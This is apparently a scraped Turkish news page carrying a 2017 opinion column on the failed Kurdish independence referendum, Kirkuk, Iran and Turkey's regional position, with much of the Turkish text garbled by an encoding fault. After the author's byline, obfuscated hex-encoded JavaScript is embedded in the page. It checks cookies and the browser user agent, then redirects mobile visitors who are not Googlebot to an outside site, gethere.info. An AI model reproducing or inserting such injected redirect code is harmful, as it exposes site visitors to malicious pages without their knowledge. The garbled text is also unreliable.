Reklam
Reklam
Ezher Haber Sitesi- 21 Eylül 2021, Salı

Barzani ve IKBY Kaybetti Peki TA?rkiye Ne KazandA�?

25 Ekim 2017
1.297 kez görüntülendi

Barzani ve IKBY Kaybetti Peki TA?rkiye Ne KazandA�?
Reklam

a�?Barzani ve IKBY Kaybetti Peki TA?rkiye Ne KazandA�?a�?a�Z

KerkA?ka��e giderken evdeki bulgurdan oldu…

A�ocukluk hayalini gerA�ekleAYtirmek iA�in oynadA�AYA� kumarA� kaybettia��

IKBY lideri Mesut Barzania��ninA�a�?BaAYA�msA�z KA?rdistana�?hayalinin bir gA?nde kA?busa dA�nA?AYmesi genelde bA�yle tanA�mlandA�. 16 Ekima��deki harekA?tA�n ardA�ndan KerkA?k dA?hil birA�ok kentin neredeyse tek kurAYun atA�lmadan Irak ordusu ve A�ran destekli HaAYdi Azabia��ye devredilmesiyle birlikte IKBY topraklarA� yA?zde 35 kA?A�A?ldA?. SA�nA�rlarA� 2014a��deki sA�nA�rlara geri dA�ndA?. Azimdi elde kalanlar da tehdit altA�ndaa��

Barzania��nin hayali neden kA?busa dA�nA?AYtA?? GA?vendiAYi A�evreler neden onu yA?zA?stA? bA�raktA�? Ortaya A�A�kan yeni konjonktA?r TA?rkiyea��ye ne kazandA�rdA�, ne kaybettirdi?

TSKa��nA�n A�dlipa��e yA�nelik harekatA�, Rakkaa��nA�n terA�r A�rgA?tA? PKK/PYDa��nin eline geA�mesi bA�lgeyi nasA�l etkileyecek? DeAYiAYen dinamikler bA�lgenin geleceAYine iliAYkin neler sA�ylA?yor?

AralarA�ndaki krizlerin sA?rekli A�eAYitlendiAYi bir dA�nemde TA?rkiye-ABD iliAYkileri nereye evrilecek, bu iliAYkilerin OrtadoAYu siyasetine yansA�malarA� ne olacak?

IKBYa��nin baAYA�msA�zlA�k referandumu sA?reci sonrasA� yaAYadA�AYA� hayal kA�rA�klA�AYA�nA�n ardA�ndan cevaplarA� aranan sorulardA� bunlara��

OrtadoAYua��nun gA?ndeminde baAYka konular da vardA� kuAYkusuz. Mesela, bA�lgede yaAYanan alt-A?st oluAYlarA�n ardA�ndan gA?nA?n sonunda adA�nA� hep kazananlar listesinin en A?st sA�rasA�na yazdA�ran, Obama dA�neminde A�nA? aA�A�lan A�ran, Donald Trump dA�nemiyle birlikte yenidenA�a�?AYer A?lkea�?A�moduna dA�ndA?.

ABD-A�srail ikilisinun yanlarA�na aldA�klarA� kimi KA�rfez A?lkelerinin, A�rana��A� kA�AYeye sA�kA�AYtA�rma stratejilerinde neler var? SA�z konusu koalisyon, Tahrana��a yA�nelik dillendirdikleri kaygA�larA�nA� hangi metotla izale edecekler? BatA�-A�ran arasA�ndaki nA?kleer anlaAYmanA�n bozulmasA� da dahil yeni yaptA�rA�mlarla mA� yoksa daha radikal bir metotla mA� a�?A�rana��a dura�? denilecek?A� Bu metotlarA�n bA�lge ve A�zellikle de TA?rkiye A?zerindeki muhtemel yansA�malarA� ne olacak?

-Somali, geA�en ay, son yA�llarA�n zayiatA� en bA?yA?k terA�r eylemine sahne oldu. Bomba yA?klA? kamyonla gerA�ekleAYtirilen saldA�rA�da tam 350 kiAYi hayatA�nA� kaybetti.A� Eylemi terA�r A�rgA?tA?A�El-AzebabA�A?stlendi. Bir iddiaya gA�re hedef TA?rkiye ve Katara��dA�. Bu baAYlamda terA�r A�rgA?tA? A?zerinden TA?rkiye ve Katar konusundaki duruAYu nedeniyle Somali hA?kA?metine de mesaj gA�nderilmiAYti. SaldA�rA�nA�n gerA�ek hedefinin kim ya da kimler olduAYu, eylemin arkasA�ndaki sponsorlara dair OrtadoAYu medyasA�na yansA�yanlar KA�rfeza��in tartA�AYA�lan A?lkesini iAYaret ediyordu.

-A�Ekim ayA� Filistin siyaseti aA�A�sA�ndan A�nemli dA�nA?m noktalarA�ndan birine AYahit oldu. 2006a��dan bu yana iki ayrA� siyasi yapA�ya bA�lA?nmA?AY olan Filistina��de Hamas ile El-Fetih, MA�sA�ra��A�n arabuluculuAYuyla yapA�lan gA�rA?AYmeler sonucunda uzlaAYarak ortak bir hA?kA?met kurmaya karar verdiler. Kimilerine gA�re bu uzlaAYA� Hamas aA�A�sA�ndan geri adA�m olarak gA�rA?ldA?. Kimilerine gA�re ise kuAYatA�lmA�AYlA�ktan kurtulma yolunda atA�lmA�AY stratejik bir hamlea��

-Suudi Arabistana��da yeni veliahtA�Muhammed bin SelmanA�ile birlikte baAYlayan sosyal-kA?ltA?rel aA�A�lA�mlarA�nA�a�?KA�rfez A?lkelerinin laikleAYmesia�?A�baAYlamA�nda tartA�AYA�lmasA� OrtadoAYua��nun A�n palana A�A�kan gA?ndemlerinden bir diAYeri idia��

Ekim ayA�nA�n bu yoAYun trafiAYinde yaAYananlardan hareketle, dA?nya gA?ndemini A�nA?mA?zdeki gA?nlerde neler beklediAYine iliAYkin gA�rA?AYlerimizi paylaAYmak istiyoruz.

IKBY BaAYA�msA�zlA�k Referandumu ve SonrasA�

Referandum sA?recine nasA�l gelindiAYini A�zetleyerek baAYlayalA�m. KA?resel ve bA�lge aktA�rlerinin hedeflerine ulaAYmada en A�nemli enstrA?man haline gelen terA�r A�rgA?tA? DAA�Az, bu anlamda, bA�lge iA�i ve dA�AYA� tA?m aktA�rlere A�nemli fA�rsatlar da sundu. IKBY lideri Mesut Barzani de DAA�Aza��in neden olduAYu konjonktA?rA? fA�rsata dA�nA?AYtA?rmek istedi. DAA�Aza��in istila ettiAYi ve halkA�nA� boAYalttA�AYA� yerleri zaman iA�erisinde terA�r A�rgA?tA?nden geri alarak kendi bA�lgesine kattA�. AralarA�nda ihtilaflA� yerlerinde olduAYu, hazA�r boAYalmA�AY yerlere kendi vatandaAYlarA�nA� yerleAYtirdi. Merkezi yA�netimle yaAYanan sA?rtA?AYmeli sA?recin ardA�ndan referandum A�ncesi gA?nlere gelindi. Barzani, tA?m uyarA�lara raAYmen sonunda hayalini kurduAYu baAYA�msA�zlA�AYa kavuAYacaAYA� A?midiyle referandum sA?recini devam ettirdi. Ama sonunu getiremedi. A�A� ve dA�AY nedenlere baAYlA� olarak bu rA?ya tahakkuk etmedi. Hem de beklenenden A�ok daha hA�zlA� bir biA�imde A�A�ktA? bu hayal. TartA�AYmalA� bA�lgeleriniA� a�?BaAYA�msA�z KA?rdistana�?aA� katmak isterken sahip olduklarA�nA� da kaybetme riski ile karAYA� karAYA�ya.

Evet, 16 Ekim sonrasA� bambaAYka bir konjonktA?r var artA�k Iraka��ta. IKBY kendi iA�inde A�ok daha problemli. Iraka��taki KA?rt siyasi hareketi iA�erisinde muhafazakA?r kanatA�n temsilcisi gA�rA?len KDPa��nin lideri Barzani ile sosyalist-laik blokun temsilcisi KYBa��nin arasA�ndaki rekabet yeniden, KA?rtler arasA� iA� A�atA�AYma kA�yA�sA�na gelmiAY durumda.

PeAYmerge gA?A�leri kendi aralarA�nda bA�lA?nA?rken A�ran destekli HaAYdi Azabi ve Irak ordusu sahada A�ok daha gA?A�lA?. Azimdilik Iraka��A�n bA�lA?nmemesinden yana tavA�r alan uluslararasA� konjonktA?rde esen rA?zgar BaAYdat yA�netiminden yana. KomAYularA�nA�n hava sahalarA�nA� kapatmalarA� dolayA�sA�yla dA�AY dA?nyaya aA�A�lamayan,A� ekonomik anlamda zor gA?nler yaAYayan IKBY, BaAYdat yA�netimi ile aralarA�ndaki sorunlarA� artA�k diplomasi yoluyla A�A�zA?lmesinden yana olduAYunu ifade ediyor ama bu sefer masada eli A�ok zayA�f.

DolayA�sA�yla referandum ile baAYlayan sA?recin kaybedeni Mesut Barzani ve IKBY. Kazanan ise BaAYdat. Daha doAYrusu BaAYdata��A�n patronu A�ran. Dini liderA�Ali Hamaneya��in a�?manevi himayesindekia�?A�HaAYdi AzabiA�gA?A�lerinin etkili rolA? olmasa,A�KudA?s OrdusuA�komutanA�A�KasA�m SA?leymania��nin, sevk ve idaresi ve dahi Talabani ailesi ile A�evirdiAYi Acem oyunlarA� devreye sokulmasa A�badi yA�netiminin bu baAYarA�yA� elde etmesi mA?mkA?n deAYildi.

KerkA?ka��A?n 24 saat iA�inde el deAYiAYtirmesinin ortaya A�A�kardA�AYA� bir baAYka gerA�ek,A�a�ZKA?rtlerin bir kez daha ABD tarafA�ndan oyuna getirilmiAY olmasA�ydA�. ABDA�a�ZbaAYkanA� Trumpa��A�n BaAYdat ile Erbil arasA�ndaki A�atA�AYmada tarafsA�zA�a�ZkalacaklarA�nA� ilan etmesi Barzani yA�netimi iA�in tam bir hayal kA�rA�klA�AYA� oldu.A�Barzania��nin son referandum hamlesiyle baAYlayan geliAYmeler bA�lge KA?rtlerinin baAYat gA?A�lere neA�a�Zkadar gA?venebileceklerini bir kez daha ortaya koymuAY oldu.

Peki ABD, Barzania��yi neden yA?z A?stA? bA�raktA�? Ya da IKBY neye gA?venerek baAYA�msA�zlA�k referandumu adA�mA�nA� attA�? Iraka��A�n eski ABD BA?yA?kelA�isiA�Lukman FailyA�bunun nedenini AYA�yle izah ediyor:A�a�?IraklA� KA?rtlerin DEAAz ile mA?cadelede baAYarA�lA� olmalarA�nA�n ve ABDa��nin KA?rtleri A�nemli bir ortak gA�rmesinin, ABDa��nin sA�z konusu referandumu desteklemesi iA�in yeterli olduAYunu dA?AYA?ndA?ler. Ama bu tamamen yanlA�AY bir okumaydA�. ABDa��nin Iraka��taki menfaatleri daha geniAYtir.”

A�a�?Barzani ve IKBY Kaybetti peki TA?rkiye Ne KazandA�?a�?

Referandum sA?reci sonrasA�nA�n en dikkat A�eken polemiklerinden biri de bu soru etrafA�ndan yaAYandA�. TA?rkiyea��deki kimi analizlerde a�?Kuzey Iraka��taki siyasi oluAYumlar arasA�nda TA?rkiyea��ye en yakA�n siyasi kanat olan KDPa��nin ve onun lideri Mesut Barzania��nin, A�ran destekli a�?terA�rist HaAYdi Azabia�? milisleri karAYA�sA�nda yenilmesine TA?rkiyea��de neden seviniliyor?a�? sorusu soruluyordu.

BaAYka analizlerde ise a�?Irak ordusunun TA?rkiyea��nin tezleriyle de A�rtA?AYA?r biA�imde Kuzeya��e ilerlemesini, Barzania��nin iAYgal ettiAYi bA�lgeleri geri almasA�nA�, TA?rkiyea��nin A�dliba��e girmesini, Akdeniza��den A�ran sA�nA�rA�na uzatA�lan terA�r koridoru projesinin A�A�kmesini hazmedemeyenler, AYimdi de a�?A�ran kazandA�, TA?rkiye kaybettia�? sA�ylemiyle kamuoyunun zehirlendiAYia�? gA�rA?AYA? ileri sA?rA?lA?yordu.

Iraka��ta ortaya A�A�kan son durumu, TA?rkiye aA�A�sA�ndan, a�?yukarA� tA?kA?rsen bA�yA�k aAYaAYA� tA?kA?rsen sakala�? AYeklinde A�zetlemek mA?mkA?n aslA�nda. TA?rkiyea��nin ekonomik anlamda gA?A�lA? baAYlar kurduAYu Barzania��nin, Kuzey Iraka��ta kaybeden taraf olmasA�, evet TA?rkiye aA�A�sA�ndan bir gA�rA?AYe gA�re handikap olarak gA�rA?lebilir. Ancak Mesut Barzania��nin, tA?m uyarA�lara raAYmen Ankaraa��nA�n kaygA�larA�na kulaklarA�nA� tA�kamasA�, baAYA�msA�zlA�k konusunda A�srarA�nA� sA?rdA?rmesi, ABDa��nin gizlice kulaAYA�na fA�sA�ldadA�klarA�na ve A�sraila��e gA?venerek hareket etmesi, TA?rkiyea��yi kendi milli A�A�karlarA� aA�A�sA�ndan en uygun olanA� tercih etmeye sevk etti. Yani TA?rkiyea��yi bA�yle bir tercihe zorlayan Barzani oldu. Iraka��A�n parA�alanmasA�nA� istemeyen Irak ve A�ran ile iAYbirliAYine gitti TA?rkiye. Akdeniza��e ulaAYmayA� hedefleyen bir a�?terA�r koridorua�? realitesi, TA?rkiyea��nin referandum konusundaki kararlA� duruAYunda etkili oldu.

Iraka��taki Yeni KonjonktA?r ve Riskler

Peki KerkA?ka��A?n BaAYdata��A�n kontrolA?ne geA�mesinin ardA�ndan bA�lgeyi neler bekleniyor? YaAYanmasA� muhtemel geliAYmeler ve dillendirilen senaryolar neler? Bundan sonraki sA?reA�te IKBYa��nin KerkA?ka��te A�srarcA� olup olmayacaAYA� bA?yA?k A�nem arz ediyor. DolayA�sA�yla Irak merkezi yA�netimi aA�A�sA�ndan her AYeyin yolunda gittiAYini sA�ylemek iA�in erken.

PeAYmergenin KerkA?ka��ten A�atA�AYmadan A�ekilmesi, KA?rt-Azii, KA?rt-Arap, KA?rt-TA?rkmen iA� savaAYA�nA� arzu edenlerin beklentilerini boAYa A�A�karmasA� aA�A�sA�ndan oldukA�a A�nemli. Ama bu risk tamamen ortadan kalkmA�AY deAYil. A�ran destekli HaAYdi Azabi militanlarA�nA�n ve Irak ordusunun bir gA?A� zehirlenmesi ile hareket ederek Erbila��e yA�nelmesi A�ok ciddi sonuA�lar doAYurabilir.

-IKBY iA�indeki KDP ve KYB arasA�ndaki ayrA�AYmanA�n nereye evrileceAYi ayrA� bir konu. Barzani ve Talabani aileleri arasA�ndaki siyasi rekabetin A�atA�AYmaya hatta bunun IKBYa��nin kendi iA�inde parA�alanmasA�na ve birden A�ok federal bA�lge ortaya A�A�kmasA�na yol aA�acak bir sA?rece kadar gidebileceAYi dillendiriliyor. Bu noktada Amerikaa��nA�n yatA�rA�m yaptA�AYA� PKK/PYDa��nin Irak ve Suriyea��deki KA?rt siyasi hareketi A?zerindeki etkisinin artabileceAYini sA�ylemek mA?mkA?n.

-KerkA?ka��A?n dA?AYmesi sonrasA� eli gA?A�lenen A�rana��A�n nasA�l bir politika izleyeceAYi de A�nemli.A� “DAA�Az sonrasA� Irak ve Suriyea��nin parA�alanmasA�nA� engelleme” ortak paydasA�nda buluAYan TA?rkiye, Irak ve A�rana��A�n bu noktada birbirlerine ihtiyaA� duyduklarA�nA�n altA� A�iziliyor. DolayA�sA�yla, A�zellikle PKK terA�r A�rgA?tA? konusunda zikzaklar A�izen Tahrana��A�n, yeniden ABDa��nin hedefi haline geldiAYi bir dA�nemde TA?rkiyea��yi de karAYA�sA�na almaktan imtina edeceAYi beklentisi var. Bu beklenti ne kadar karAYA�lA�k bulur AYA?pheli olsa da Tahrana��A�n, TA?rkiyea��ye karAYA� daha gA?venilir bir komAYu olmak zorunda hissedeceAYi bir sA?reA� bekliyor bA�lgeyi.

-Kuzey Iraka��ta, KerkA?ka��A?n kaybedilmesinin mimarA� olarak gA�rA?len Mesut Barzania��nin KDPa��sinin bA?yA?k yara almasA�nA�n hata siyasi mevta olarak gA�rA?lmesinin ardA�ndan, A�rana��a yakA�nlA�AYA�yla bilinen KYB ve Goran hareketinin Kuzey Irak iA� siyasi dengelerinde A�ok daha belirleyici olacaAYA�nA� sA�ylemek mA?mkA?n. Bu da bA�lgedeki TA?rkiye-A�ran rekabetinde, Tahran iA�in bA?yA?k AYans, Ankara aA�A�sA�ndan ise ayrA� bir handikap olacak.

-A�nA?mA?zdeki sA?reA�te bA�lgedeki geliAYmeleri derinden etkilemeye aday bir baAYka husus, Trumpa��A�n yeni A�ran stratejisi olacak. Mahiyetinin ne olacaAYA� henA?z tam olarak netleAYmiAY deAYil, ancak bu stratejinin daha AYimdiden A�srail ve kimi KA�rfez A?lkelerini bir hayli heyecanlandA�rdA�AYA�nA� sA�ylemek mA?mkA?n.

Trump liderliAYindeki ABD-A�srail-KA�rfez koalisyonunun, A�rana��A� kuAYatma sA?recinde TA?rkiyea��den beklentilerinin ne olacaAYA�, bu beklentilere Ankaraa��nA�n nasA�l cevap vereceAYi hem kuAYatmanA�n baAYarA�lA� olup olmamasA�nda hem de uA�uruma doAYru giden TA?rkiye-ABD ve A�te yandan bA�lgeye iliAYkin ortak kaygA�lar taAYA�yan TA?rkiye-A�ran iliAYkilerinin seyrini belirleyen A�nemli faktA�rlerden biri olacak. TA?rkiye bu noktada nerede duracak?

Benzer bir durum BaAYdat yA�netimi iA�in de geA�erli. A�rana��A� a�?tedip etmeyia�? A�ngA�ren Trump stratejisinde A�badi yA�netimi nerede duracak sorusu A�ok daha bA?yA?k A�nem arz ediyor. Vilayeti haline geldiAYi A�rana��A�n mA�, KerkA?k operasyonunda a�?tarafsA�za�? kalarak A�nA?nA? aA�an, Iraka��A�n AYiileAYtirilmesinin mimarA�, mA?ttefiki Amerikaa��nA�n mA�?

-KerkA?k ve A�dliba��in gA�lgesinde kalsa da geA�en ayA�n baAY dA�ndA?ren geliAYmelerinden bir diAYeri ise DAA�Aza��in Suriyea��nin kuzeyindeki fiili baAYkenti Rakkaa��nA�n, ABD desteAYindeki terA�r A�rgA?tA? SDGa��nin eline geA�mesi oldu.

Ele geA�irilirken harabeye dA�ndA?rA?len SA?nni Arap AYehri Rakkaa��nA�n demografik dA�nA?AYA?me uAYrayacaAYA� kaygA�sA� had safhada. ABD himayesinde, terA�r A�rgA?tA? PKK/PYD eliyle gerA�ekleAYecek demografik dA�nA?AYA?me bA�lgenin sahibi Arap aAYiretlerin A�yle kolay kolay boyun eAYmeyecekleri sA�yleniyor. DolayA�sA�yla Rakka DAA�Aza��ten kurtuldu ama daha bA�lgede sular durulmuAY deAYil.

-Musul ve Rakkaa��nA�n ardA�ndan bA?yA?k darbe yiyen DAA�Aza��in artA�k hem Iraka��ta hem de Suriyea��deki etkisi A�nemli A�lA�A?de sA�fA�rlanmA�AY durumda. DAA�Az sonrasA� ne olacaAYA�, Irak ve Suriye gA?ndeminin en A�nemli sorusu olarak A�n plana A�A�kA�yor.

Hem kA?resel hem de bA�lgesel aktA�rler DAA�Az sonrasA�na iliAYkin uzun zamandA�r hazA�rlA�k yapA�yorlar. Bu yeni dA�nemde yavaAY yavaAY ellerindeki son kozlarA� da sahaya sA?rmeye baAYladA�lar. TA?rk askerlerinin, A�ran ve Rusya ile varA�lan anlaAYma sonucunda “A�atA�AYmasA�zlA�k bA�lgesi” olarak ilan edilen A�dliba��e, A�SO birliklerinin refakatiyle girmesi TA?rkiye sA�nA�rA�nA�n bin 334 kilometrelik kA�smA�nda inAYa edilmeye A�alA�AYA�lan terA�r koridoruna son verecek ikinci ve en etkili hamle diye nitelendirildi. TA?rkiyea��nin A�dlip hamlesinin hemen ardA�ndan Amerika ile TA?rkiye arA�sA�nda patlak veren vize krizi, Amerikaa��nA�n bu operasyondan duyduAYu rahatsA�zlA�k olarak okundu. Tabi, ABDa��nin TA?rkiyea��nin hamlelerinden duyduAYu rahatsA�zlA�klar var ancak bunlar haklA� rahatsA�zlA�klar deAYil. Aksine TA?rkiyea��nin Amerikaa��dan duyduAYu haklA� rahatsA�zlA�klarA�n haddi hesabA� yok.

Toparlarsak OrtadoAYua��da mA?thiAY bir altA?st oluAY yaAYanA�yor. Bunun daha uzun sA?re yaAYanacaAYA�nA� A�ngA�rmek iA�in uzman olmaya gerek yok herhalde. SA�nA�rlarA�n bir gA?nde A�nemli A�lA�A?de deAYiAYtiAYi bir dA�nemde, mA?ttefiklikler de dA?AYmanlA�klar da aynA� hA�zla konjonktA?rel olarak deAYiAYiyor. NATO A?yesi TA?rkiye, kendisini savunmak iA�in NATOa��daki mA?ttefiklerine deAYil NATOa��nun hedefindeki A?lkelere daha A�ok gA?venmek zorunda kalA�yor.

Evet, bA?yA?k bir altA?st yaAYandA�AYA�nA� sA�ylemiAYtik. Bu altA?st oluAYlarA�n ardA�ndan kimin ayakta kalacaAYA�nA� gA?A� ve stratejik akA�l belirleyecek. Sadece masada gA?A�lA? olmak yetmiyor, sahada da gA?A�lA? olmak gerekiyor. Sahada gA?A�lA? olmanA�z masada gA?A�lA? olmanA�zA� saAYlA�yor. TA?rkiye de hem masada hem de sahada olmaya A�alA�AYA�yor gA?cA? yettiAYince.

 

BEYTULLAH DEMA�RCA�OAzLU

EL EZHER MEZUNUvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

beğen(0)beğenme(0)

Yorumlar

Henüz yorum yapılmamış.

Yorum Yaz